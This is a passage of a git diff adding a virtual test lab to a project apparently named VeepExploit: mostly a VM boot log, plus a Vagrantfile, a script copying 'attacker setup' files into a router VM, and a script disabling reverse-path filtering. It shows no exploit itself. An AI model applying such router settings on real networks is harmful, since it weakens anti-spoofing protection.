traffic allowed by default +[ 3.047884] amd_nb: Cannot enumerate AMD northbridges +[ 3.051453] clocksource: Switched to clocksource kvm-clock +[ 3.075228] AppArmor: AppArmor Filesystem Enabled +[ 3.078497] pnp: PnP ACPinit +[ 3.213822] pnp: PnP ACPI: found 3 devices + +[ 3.234531] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns +[ 3.25255] NET: Registered protocol family 2 + +[ 3.389762] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 3.391055] TCP bind hash table entries: 8192 (order: 5, 131072 byte +[ 3.480673] TCP: Hash tables configured (established 8192 bind 8192) +[ 3.483336] UDP hashtable etries: 512 (order: 2, 16384 bytes) +[ 3.682013] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) +[ 3.685425 NET: Registed protocol family 1 +[ 3.873945] pci 0000:00:00.0: Limiting direct PCI/PCI transfers +[ 3.877914] pci 0000:00:01.0: Activating ISA DMA hang workarounds +[ 3.895725] Unpacking initramfs... + +[ 4.390451] Freeing initrd memory: 14880K +[ 4.397531] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 4.403964] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 4.409033] Scanning for low memory corruption every 60 seconds +[ 4.425974] audit: initializing netlink subsys (disabled) +[ 4.428134] audit: type=2000 audit(1611614298.750:1): initialized +[ 4.433088] Initialise system trusted keyring +[ 4.436953] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 4.441108] zbud: loaded +[ 4.445877] VFS: Disk quotas dquot_6.6.0 +[ 4.447363] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 4.449241] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 4.454243] fuse init (API version 7.23) +[ 4.455304] Key type big_key registered +[ 4.456257] Allocating IMA MOK and blacklist keyrings. +[ 4.458513] Key type asymmetric registered +[ 4.459469] Asymmetric key parser 'x509' registered +[ 4.466550] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) +[ 4.479287] io scheduler noop registered +[ 4.482195] io scheduler deadline registered (default) +[ 4.484788] io scheduler cfq registered +[ 4.486645] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 4.494527] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 4.496170] ACPI: AC Adapter [AC] (on-line) +[ 4.497288] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 4.500739] ACPI: Power Button [PWRF] +[ 4.501829] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 4.505271] ACPI: Sleep Button [SLPF] +[ 4.511448] ACPI: Battery Slot [BAT0] (battery present) +[ 4.515689] GHES: HEST is not enabled! +[ 4.518457] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 4.555857] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ 4.561626] Linux agpgart interface v0.103 +[ 4.572806] loop: module loaded +[ 4.575901] scsi host0: ata_piix +[ 4.577097] scsi host1: ata_piix +[ 4.577994] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 +[ 4.581135] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 +[ 4.585122] libphy: Fixed MDIO Bus: probed +[ 4.586197] tun: Universal TUN/TAP device driver, 1.6 +[ 4.587497] tun: (C) 1999-2004 Max Krasnyansky +[ 4.595111] PPP generic driver version 2.4.2 +[ 4.597970] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 4.599428] ehci-pci: EHCI PCI platform driver +[ 4.600571] ehci-platform: EHCI generic platform driver +[ 4.612616] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 4.615275] ohci-pci: OHCI PCI platform driver +[ 4.616441] ohci-platform: OHCI generic platform driver +[ 4.619221] uhci_hcd: USB Universal Host Controller Interface driver +[ 4.628431] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 4.635199] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 4.636496] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 4.637808] mousedev: PS/2 mouse device common for all mice +[ 4.653843] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 4.657260] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 4.660214] i2c /dev entries driver +[ 4.661236] device-mapper: uevent: version 1.0.3 +[ 4.663023] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 4.663400] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 4.672730] ledtrig-cpu: registered to indicate activity on CPUs +[ 4.680974] NET: Registered protocol family 10 +[ 4.684563] NET: Registered protocol family 17 +[ 4.692588] Key type dns_resolver registered +[ 4.697287] registered taskstats version 1 +[ 4.700838] Loading compiled-in X.509 certificates +[ 4.704698] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 4.711078] zswap: loaded using pool lzo/zbud +[ 4.720481] Key type trusted registered +[ 4.726988] Key type encrypted registered +[ 4.728017] AppArmor: AppArmor sha1 policy hashing enabled +[ 4.729432] ima: No TPM chip found, activating TPM-bypass! +[ 4.736774] ima: Allocated hash algorithm: sha1 +[ 4.737854] evm: HMAC attrs: 0x1 +[ 4.739076] Magic number: 5:763:654 +[ 4.740061] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:16 UTC (1611614296) +[ 4.742112] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 4.743414] EDD information not available. +[ 4.749948] Freeing unused kernel memory: 1492K +[ 4.764377] Write protecting the kernel read-only data: 14336k +[ 4.772691] Freeing unused kernel memory: 1592K +[ 4.776924] Freeing unused kernel memory: 56K +Loading, please wait... +starting version 229 +[ 4.829923] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.831901] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.831931] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.836995] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.840469] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.867693] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.870960] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.873259] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.873363] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.873424] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 5.015050] Fusion MPT base driver 3.04.20 +[ 5.031892] Copyright (c) 1999-2008 LSI Corporation +[ 5.054803] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 5.068173] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 5.085438] Fusion MPT SPI Host driver 3.04.20 +[ 5.183111] AVX2 version of gcm_enc/dec engaged. +[ 5.216545] AES CTR mode by8 optimization enabled +[ 5.307990] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 5.741928] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 5.747242] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 5.761616] mptbase: ioc0: Initiating bringup +[ 5.831678] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 6.017013] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 6.129423] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.144482] scsi target2:0:0: Beginning Domain Validation +[ 6.147535] scsi target2:0:0: Domain Validation skipping write tests +[ 6.149879] scsi target2:0:0: Ending Domain Validation +[ 6.152473] scsi target2:0:0: asynchronous +[ 6.160806] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.164889] scsi target2:0:1: Beginning Domain Validation +[ 6.179042] scsi target2:0:1: Domain Validation skipping write tests +[ 6.182848] scsi target2:0:1: Ending Domain Validation +[ 6.187245] scsi target2:0:1: asynchronous +[ 6.207956] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 6.214533] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 6.223454] sd 2:0:0:0: [sda] Write Protect is off +[ 6.227923] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 6.230658] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 6.239064] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 6.243886] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 6.249730] sd 2:0:1:0: [sdb] Write Protect is off +[ 6.252882] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 6.255818] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 6.263222] sda: sda1 +[ 6.265703] sd 2:0:0:0: [sda] Attached SCSI disk +[ 6.273351] sd 2:0:1:0: [sdb] Attached SCSI disk +[ 6.596178] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:4a:48:46 +[ 6.607624] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 7.047884] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:0a:3f:27 +[ 7.050079] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection +[ 7.077469] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 7.108201] e1000 0000:00:03.0 enp0s3: renamed from eth0 +[ 7.318261] e1000 0000:00:09.0 enp0s9: renamed from eth2 +Begin: Loading e[ 8.933114] md: linear personality registered for level -1 +ssential drivers ... [ 8.965543] md: multipath personality registered for level -4 +[ 8.974078] md: raid0 personality registered for level 0 +[ 8.986893] md: raid1 personality registered for level 1 +[ 9.067507] raid6: sse2x1 gen() 5791 MB/s +[ 9.138439] raid6: sse2x1 xor() 4668 MB/s +[ 9.207974] raid6: sse2x2 gen() 7813 MB/s +[ 9.275459] raid6: sse2x2 xor() 5497 MB/s +[ 9.359472] raid6: sse2x4 gen() 11602 MB/s +[ 9.427463] raid6: sse2x4 xor() 6950 MB/s +[ 9.523457] raid6: avx2x1 gen() 12830 MB/s +[ 9.591455] raid6: avx2x2 gen() 15248 MB/s +[ 9.659458] raid6: avx2x4 gen() 23384 MB/s +[ 9.660596] raid6: using algorithm avx2x4 gen() 23384 MB/s +[ 9.661882] raid6: using avx2x2 recovery algorithm +[ 9.674338] xor: automatically using best checksumming function: +[ 9.719458] avx : 18383.000 MB/sec +[ 9.726420] async_tx: api initialized (async) +[ 9.772115] md: raid6 personality registered for level 6 +[ 9.777442] md: raid5 personality registered for level 5 +[ 9.784930] md: raid4 personality registered for level 4 +[ 9.815670] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 9.934468] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file system +[ 9.999883] EXT4-fs (sda1): INFO: recovery required on readonly filesystem +[ 10.047957] EXT4-fs (sda1): write access will be enabled during recovery +[ 10.091868] EXT4-fs (sda1): recovery complete +[ 10.411204] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 10.615690] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) +[ 10.630704] systemd[1]: Detected virtualization oracle. +[ 10.637884] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 10.661335] systemd[1]: Set hostname to . +[ 10.979032] systemd[1]: Reached target System Time Synchronized. +[ 10.980607] random: nonblocking pool is initialized +[ OK ] Reached target System Time Synchronized. +[ 11.058363] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 11.330368] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 11.406290] systemd[1]: Set up automount Arbitrary Excutable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 11.489790] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 11.501103] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 11.508454] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 11.517344] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 11.523293] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 11.532166] systemd[1]: Created slice System Slice. +[ OK ] Created slice System Slice. +[ 11.541134] systemd[1]: Created slice system-serial\x2dgetty.slice. +[ OK ] Created slice system-serial\x2dgetty.slice. +[ 11.548290] systemd[1]: Reached target User and Group Name Lookups. +[ OK ] Reached target User and Group Name Lookups. +[ 11.556476] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK ] Started Forward Password Requests to Wall Directory Watch. +[ 11.567709] systemd[1]: Listening on Journal Socket. +[ OK ] Listening on Journal Socket. + +[ 11.600394] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 11.633977] systemd[1]: Starting Nameserver information manager... + Starting Nameserver information manager... +[ 11.650651] systemd[1]: Starting Remount Root and Kernel File Systems... + Starting Remount[ 11.658858] EXT4-fs (sda1): re-mounted. Opts: (null) + Root and Kernel File Systems... +[ 11.672247] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 11.685124] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 11.707119] Loading iSCSI transport class v2.0-870. +[ 11.719712] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 11.729679] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 11.742255] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 11.766365] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 11.787339] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 11.797722] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Sock[ 11.815538] iscsi: registered transport (tcp) +et. +[ 11.876125] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 11.947592] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 12.032343] systemd[1]: Mounting Debug File System... + Mounting Debug File System... +[ 12.054479] systemd[1]: Reached target Slices. +[ OK ] Reached target Slices. +[ 12.081271] systemd[1]: Listening on Syslog Socket. +[ OK ] Listening on Syslog Socket. +[ 12.105598] systemd[1]: Starting Journal Service... + Starting Journal Service... +[ 12.126931] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 12.150485] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 12.199885] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 12.218257] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue [ 12.233578] iscsi: registered transport (iser) +File System. +[ 12.263788] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ OK ] Started Remount Root and Kernel File Systems. +[ OK ] Started Load Kernel Modules. +[ OK ] Started Set console keymap. +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[[0;32m OK ] Started Uncomplicated firewall. +[ OK ] Started Nameserver information manager. +[ OK ] Started LVM2 metadata daemon. + Starting Create Static Device Nodes in /dev... + Mounting FUSE Control File System... + Starting Apply Kernel Variables... + Starting udev Coldplug all Devices... + Starting Load/Save Random Seed... + Starting Flush Journal to Persistent Storage... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Started Create Static Device Nodes in /dev. +[ OK ] Started Apply Kernel Variables. +[ OK ] Started Load/Save Random Seed. + Starting udev Kernel Device Manager... +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting netfilter persistent configuration... + Starting Set console font and keymap... + Starting Initial cloud-init job (pre-networking)... + Starting LSB: AppArmor initialization... + Starting Tell Plymouth To Write Out Runtime Data... +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started udev Coldplug all Devices. +[ OK ] Started netfilter persistent configuration. +[ OK ] Started Tell Plymouth To Write Out Runtime Data. +[ OK ] Started Flush Journal to Persistent Storage. +[ OK ] Found device /dev/ttyS0. +[ OK ] Started LSB: AppArmor initialization. +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. + Starting Load AppArmor profiles managed internally by snapd... + Starting Create Volatile Files and Directories... +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started Set console font and keymap. +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Started Create Volatile Files and Directories. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ 15.084016] cloud-init[494]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:27 +0000. Up 13.40 seconds. + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Created slice system-getty.slice. +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). +[ OK ] Started ifup for enp0s3. + Starting Raise network interfaces... +[ OK ] Started ifup for enp0s8. +[ OK ] Started ifup for enp0s9. +[FAILED] Failed to start Raise network interfaces. +See 'systemctl status networking.service' for details. + Starting Initial cloud-init job (metadata service crawler)... +[ OK ] Reached target Network. +[ 19.313234] cloud-init[1172]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:32 +0000. Up 18.29 seconds. +[ 19.348770] cloud-init[1172]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ +[ 19.416316] cloud-init[1172]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.525104] cloud-init[1172]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ 19.658694] cloud-init[1172]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.805209] cloud-init[1172]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | +[ OK [ 19.812482] cloud-init[1172]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 19.813618] cloud-init[1172]: ci-info: | enp0s8 | True | 192.168.1.2 | 255.255.255.0 | global | 08:00:27:4a:48:46 | +[ 19.813762] cloud-init[1172]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe4a:4846/64 | . | link | 08:00:27:4a:48:46 | +[ 19.813878] cloud-init[1172]: ci-info: | enp0s9 | True | 172.16.4.254 | 255.255.255.0 | global | 08:00:27:0a:3f:27 | +[ 19.813994] cloud-init[1172]: ci-info: | enp0s9 | True | fe80::a00:27ff:fe0a:3f27/64 | . | link | 08:00:27:0a:3f:27 | +[ 19.814109] cloud-init[1172]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ 19.814220] cloud-init[1172]: ci-info: | lo | True | ::1/128 | . | host | . | +[ 19.814345] cloud-init[1172]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.814584] cloud-init[1172]: ci-info: ++++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++ +[ 19.814799] cloud-init[1172]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 19.814916] cloud-init[1172]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | +[ 19.815031] cloud-init[1172]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 19.815156] cloud-init[1172]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ 19.815269] cloud-init[1172]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | +[ 19.815401] cloud-init[1172]: ci-info: | 2 | 172.16.4.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | +[ 19.815568] cloud-init[1172]: ci-info: | 3 | 192.168.0.0 | 192.168.1.254 | 255.255.0.0 | enp0s8 | UG | +[ 19.815665] cloud-init[1172]: ci-info: | 4 | 192.168.1.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 19.815816] cloud-init[1172]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 19.815942] cloud-init[1172]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ 19.816032] cloud-init[1172]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 19.816118] cloud-init[1172]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 19.816207] cloud-init[1172]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 19.816293] cloud-init[1172]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | +] Started Initial cloud-init job (metadata service crawler). +[ OK ] Reached target System Initialization. +[ 19.816523] cloud-init[1172]: ci-info: | 1 | fe80::/64 | :: | enp0s9 | U | +[ 21.496335] cloud-init[1172]: ci-info: | 2 | fe80::/64 | :: | enp0s3 | U | +[ OK [ 21.548310] cloud-init[1172]: ci-info: | 8 | ff00::/8 | :: | enp0s8 | U | +[ 21.549847] cloud-init[1172]: ci-info: | 9 | ff00::/8 | :: | enp0s9 | U | +[ 21.551607] cloud-init[1172]: ] Started ACPI Events Check. +[ OK ] Reached target Paths. +ci-info: | 10 | ff00::/8 | :: | enp0s3 | U |[ OK ] Started Message of the Day. +[ OK ] Listening on ACPID Listen Socket. +[ OK ] Started Daily Cleanup of Temporary Directories. +[ OK ] Started Daily apt download activities. + Starting LXD - unix socket. +[ OK ] Listening on UUID daemon activation socket. +[ OK ] Started Daily apt upgrade and clean activities. +[ OK ] Reached target Timers. +[ OK ] Listening on D-Bus System Message Bus Socket. + Starting Socket activation for snappy daemon. +[ OK ] Reached target Network is Online. + +[ 21.696503] cloud-init[1172]: ci-info: +-------+-------------+---------+-----------+-------+ + Starting iSCSI initiator daemon (iscsid)... +[ OK ] Reached target Cloud-config availability. +[ OK ] Listening on LXD - unix socket. +[ OK ] Listening on Socket activation for snappy daemon. +[ OK ] Reached target Sockets. +[ OK ] Reached target Basic System. + Starting Accounts Service... + Starting System Logging Service... +[ OK ] Started FUSE filesystem for LXC. +[ OK ] Started ACPI event daemon. +[ OK ] Started Deferred execution scheduler. + Starting Virtualbox guest utils... +[ OK ] Started D-Bus System Message Bus. + Starting Snap Daemon... + Starting OpenBSD Secure Shell server... + Starting /etc/rc.local Compatibility... + Starting LSB: Record successful boot for GRUB... + Starting LSB: MD monitoring daemon... + Starting Login Service... +[ OK ] Started Regular background program processing daemon. + Starting LXD - container startup/shutdown... +[ OK ] Started System Logging Service. +[ OK ] Started iSCSI initiator daemon (iscsid). +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started OpenBSD Secure Shell server. + Starting Authenticate and Authorize Users to Run Privileged Tasks... + Starting Login to default iSCSI targets... +[ OK ] Started Snap Daemon. +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Login Service. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Accounts Service. +[ OK ] Started Unattended Upgrades Shutdown. + Starting Wait until snapd is fully seeded... +[ OK ] Started Login to default iSCSI targets. +[ OK ] Started Wait until snapd is fully seeded. + Starting Apply the settings specified in cloud-config... +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting LSB: daemon to balance interrupts for SMP systems... + Starting LSB: automatic crash report generation... + Starting Permit User Sessions... + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... +[ OK ] Started Permit User Sessions. + Starting Terminate Plymouth Boot Screen... + Starting Hold until boot process finishes up... +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started LSB: automatic crash report generation. +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started Terminate Plymouth Boot Screen. +[ OK ] Started Hold until boot process finishes up. +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Started Getty on tty1. +[ OK ] Reached target Login Prompts. + Starting Set console scheme... +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Set console scheme. +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 24.088246] cloud-init[1374]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:37 +0000. Up 23.51 seconds. +[ OK ] Started Apply the settings specified in cloud-config. + Starting Execute cloud user/final scripts... +[ 26.187607] cloud-init[1441]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:39 +0000. Up 25.85 seconds. +[ 26.291171] cloud-init[1441]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 26.13 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS vague-gateway ttyS0 + +vague-gateway login: \ No newline at end of file diff --git a/virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..a838a87 --- /dev/null +++ b/virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 @@ +/home/jive/space/gittin/VeepExploit/virt-lab/routers/router1 \ No newline at end of file diff --git a/virtual-test-environment/routers/router1/Vagrantfile b/virtual-test-environment/routers/router1/Vagrantfile new file mode 100644 index 0000000..84ceea3 --- /dev/null +++ b/virtual-test-environment/routers/router1/Vagrantfile @@ -0,0 +1,21 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-router1" + + config.vm.network "forwarded_port", guest: 22, host: 22114, id: 'ssh' + config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.1.254", virtualbox__intnet: "intnet-1" + config.vm.network "private_network", ip: "192.168.100.1", virtualbox__intnet: "intnet-100" + config.vm.network "private_network", ip: "192.168.101.2", virtualbox__intnet: "intnet-101" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-router1" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/routers/router1/copy_attacker_setup.sh b/virtual-test-environment/routers/router1/copy_attacker_setup.sh new file mode 100755 index 0000000..7b5aad4 --- /dev/null +++ b/virtual-test-environment/routers/router1/copy_attacker_setup.sh @@ -0,0 +1,11 @@ +#!/bin/bash +# + + +echo Copying attacker setup scripts to router1 VM.. + + +scp -i .vagrant/machines/default/virtualbox/private_key -P 22114 ../../edgers/setups/attacker/* vagrant@localhost:~ + + + diff --git a/virtual-test-environment/routers/router1/disable_stuff.sh b/virtual-test-environment/routers/router1/disable_stuff.sh new file mode 100755 index 0000000..b9eaa91 --- /dev/null +++ b/virtual-test-environment/routers/router1/disable_stuff.sh @@ -0,0 +1,14 @@ +#!/bin/bash +# + +echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf + +echo "net.ipv4.conf.all.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.default.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.lo.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s3.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s8.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s9.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s10.rp_filter=0" >> /etc/sysctl.conf + +sysctl -p diff --git a/virtual-test-environment/routers/router1/setup_net.sh b/virtual-test-environment/routers/router1/setup_net.sh new file mode 100755 index 0000000..a8e61ab --- /dev/null +++ b/virtual-test-environment/routers/router1/setup_net.sh @@ -0,0 +1,62 